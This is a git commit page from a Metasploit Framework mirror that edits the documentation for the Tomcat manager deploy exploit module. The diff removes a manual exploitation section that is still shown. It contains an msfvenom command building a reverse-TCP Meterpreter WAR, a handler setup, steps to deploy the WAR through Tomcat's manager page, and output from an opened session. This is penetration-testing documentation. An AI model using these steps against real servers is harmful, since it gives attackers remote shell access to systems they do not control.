infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

removed gui stuff since it should be in tomcat_mgr_upload

bug/bundler_fix
h00die 2017-01-15 19:11:58 -05:00
parent b61ca669cf
commit 32271318e5
1 changed files with 7 additions and 72 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
View File

@ -3,7 +3,10 @@ This documentation is slightly different from the standard module documentation
This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.
# Cleanup
It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done [manually](#manual-cleanup).
It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This can be done [manually](#manual-cleanup).
# tomcat_mgr_upload
This module is VERY similar to `exploit/multi/http/tomcat_mgr_upload`, the main difference is this uses a `PUT` HTTP request, instead of going through a `POST` HTTP request through the GUI.
## Windows (xp sp2)
### Tomcat 6 (6.0.48)
@ -77,8 +80,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe)
The install was default, other than adding a user during install. No other options were changed.
Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
So the `/manager/html` page was visible, but deploying from there wasn't possible.
Of note, the user was given `manager-gui` permissions by default.
#### text/script Interface Exploitation
@ -132,9 +134,6 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
Meterpreter : java/windows
```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
### Tomcat 8 (8.0.39)
Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
@ -144,8 +143,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe)
The install was default, other than adding a user during install. No other options were changed.
Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
So the `/manager/html` page was visible, but deploying from there wasn't possible.
Of note, the user was given `manager-gui` permissions by default.
#### text/script Interface Exploitation
@ -195,9 +193,6 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
Meterpreter : java/windows
```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
## Linux
### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
@ -317,9 +312,6 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
Meterpreter : x86/linux
```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
Of note, as of 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
@ -381,63 +373,6 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
Meterpreter : x86/linux
```
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful, also wasn't able to figure out where the `check` command's `serverinfo` URL was located. [Manual exploitation is possible](#manual-exploitation)
# Manual Exploitation
## Create payload
This was performed on Windows XP with the following permissions as the user that was used to login:
* Tomcat 6.0.48: `manager`
* Tomcat 7.0.73: `manager-gui`
* Tomcat 8.0.39: `manager-gui`
```
/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
Payload size: 6072 bytes
Final size of war file: 6072 bytes
Saved as: meterp.war
```
## Setup Handler
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(handler) > set lport 7777
lport => 7777
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.2.117:7777
[*] Starting the payload handler...
```
## Deploy
1. With a web browser, browse to `http://<ip>:<port>/manager/html`
2. Enter credentials (no default)
3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy`
4. `meterp` should now be listed under `Applications`, meaning it was successfully deployed.
5. Either click the link for `/meterp` or browse to `http://<ip>:<port>/meterp/`
## Callback
After browsing to that page, code execution will happen, and your callback will hit.
```
[*] Starting the payload handler...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
## Manual Cleanup
This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat.
Manual cleanup can be done by logging into the `/manager` website. From there, click `Undeploy` within the `Application` list to remove the malicious app from Tomcat.